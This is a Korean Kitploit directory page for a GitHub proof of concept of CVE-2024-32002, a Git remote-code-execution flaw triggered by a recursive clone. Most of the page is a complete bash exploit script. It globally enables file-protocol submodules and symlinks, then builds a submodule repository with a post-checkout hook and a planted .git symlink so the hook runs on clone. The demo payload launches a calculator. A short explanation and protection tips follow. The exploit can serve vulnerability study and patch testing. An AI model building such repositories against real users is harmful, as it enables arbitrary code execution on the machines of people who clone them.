Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-32002-poc — CVE-2024-32002는 Git에서의 심각한 취약점으로, 사용자가 git clone 작업을 수행할 때 공격자가 원격에서 임의 코드를 실행(RCE)할 수 있도록 합니다. | Kitploit
도구/GitHubGitHub/bohemianhacks/cve-2024-32002-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubbohemianhacks/cve-2024-32002-poc

CVE-2024-32002-poc

CVE-2024-32002는 Git에서의 심각한 취약점으로, 사용자가 git clone 작업을 수행할 때 공격자가 원격에서 임의 코드를 실행(RCE)할 수 있도록 합니다.

저장소 보기
111년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Bash Script:

root@kitploit:~
#!/bin/bash

# Set Git configuration options
git config --global protocol.file.allow always
git config --global core.symlinks true
# Avoid warning messages (set default branch to main)
git config --global init.defaultBranch main 

# Define tell-tale path
tell_tale_path="$PWD/tell.tale"

# Initialize hook repository
git init hook
cd hook
mkdir -p y/hooks

# Write malicious code to hook, compatible with Windows and macOS
cat > y/hooks/post-checkout <<EOF
#!/bin/bash
calc.exe
open -a Calculator.app
EOF

# Make hook executable: important
chmod +x y/hooks/post-checkout

git add y/hooks/post-checkout
git commit -m "post-checkout"

cd ..

# Define hook repository path
hook_repo_path="$(pwd)/hook"

# Initialize captain repository
git init captain
cd captain
git submodule add --name x/y "$hook_repo_path" A/modules/x
git commit -m "add-submodule"

# Create symbolic link
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
cd ..

# Local testing (not needed for GitHub)
git clone --recursive captain hooked

쉽게 설명하자면:

이 Bash 스크립트는 취약점(CVE-2024-32002)을 악용하여 누군가 리포지토리를 클론할 때 악성 코드를 실행하도록 설계된 악의적인 Git 리포지토리를 생성합니다.

다음은 스크립트가 수행하는 작업에 대한 설명입니다.

  1. Git 설정 구성: 공격에 필요한 일부 기능을 활성화합니다.
  2. 악성 후크 리포지토리 생성: 이 리포지토리에는 누군가 클론할 때 실행될 숨겨진 스크립트가 포함되어 있습니다.
  3. 기만적인 리포지토리 생성: "captain"이라는 이 리포지토리는 겉보기에는 무해해 보이지만, 실제로는 악성 후크 리포지토리를 서브모듈로 숨기고 있습니다.
  4. 심볼릭 링크 추가: 이 속임수는 악성 후크를 숨기고 리포지토리가 클론될 때 실행되도록 하는 데 사용됩니다.

누군가 "captain" 리포지토리를 클론하면 악성 스크립트가 해당 컴퓨터에서 실행되어 잠재적으로 다음과 같은 해로운 결과를 초래할 수 있습니다.

  • 악성코드 설치: 스크립트가 악성 소프트웨어를 다운로드하여 설치할 수 있습니다.
  • 데이터 도난: 피해자 컴퓨터의 민감한 정보를 훔칠 수 있습니다.
  • 시스템 침해: 스크립트가 시스템에 무단 액세스 권한을 얻을 수 있습니다.

이러한 공격으로부터 자신을 보호하려면 다음을 수행하십시오.

  • Git 클라이언트를 최신 상태로 유지하십시오: 취약점을 해결하려면 최신 버전이 있는지 확인하십시오.
  • 리포지토리 클론 시 주의하십시오: 신뢰할 수 있는 출처의 리포지토리만 클론하십시오.
  • 신뢰할 수 있는 백신 프로그램을 사용하십시오: 악성 소프트웨어를 탐지하고 차단하는 데 도움이 될 수 있습니다.
  • 피싱 공격에 주의하십시오: 의심스러운 링크를 클릭하거나 알 수 없는 출처의 파일을 다운로드하지 마십시오.

이러한 예방 조치를 따르면 유사한 공격의 피해자가 될 위험을 크게 줄일 수 있습니다.

도구 다운로드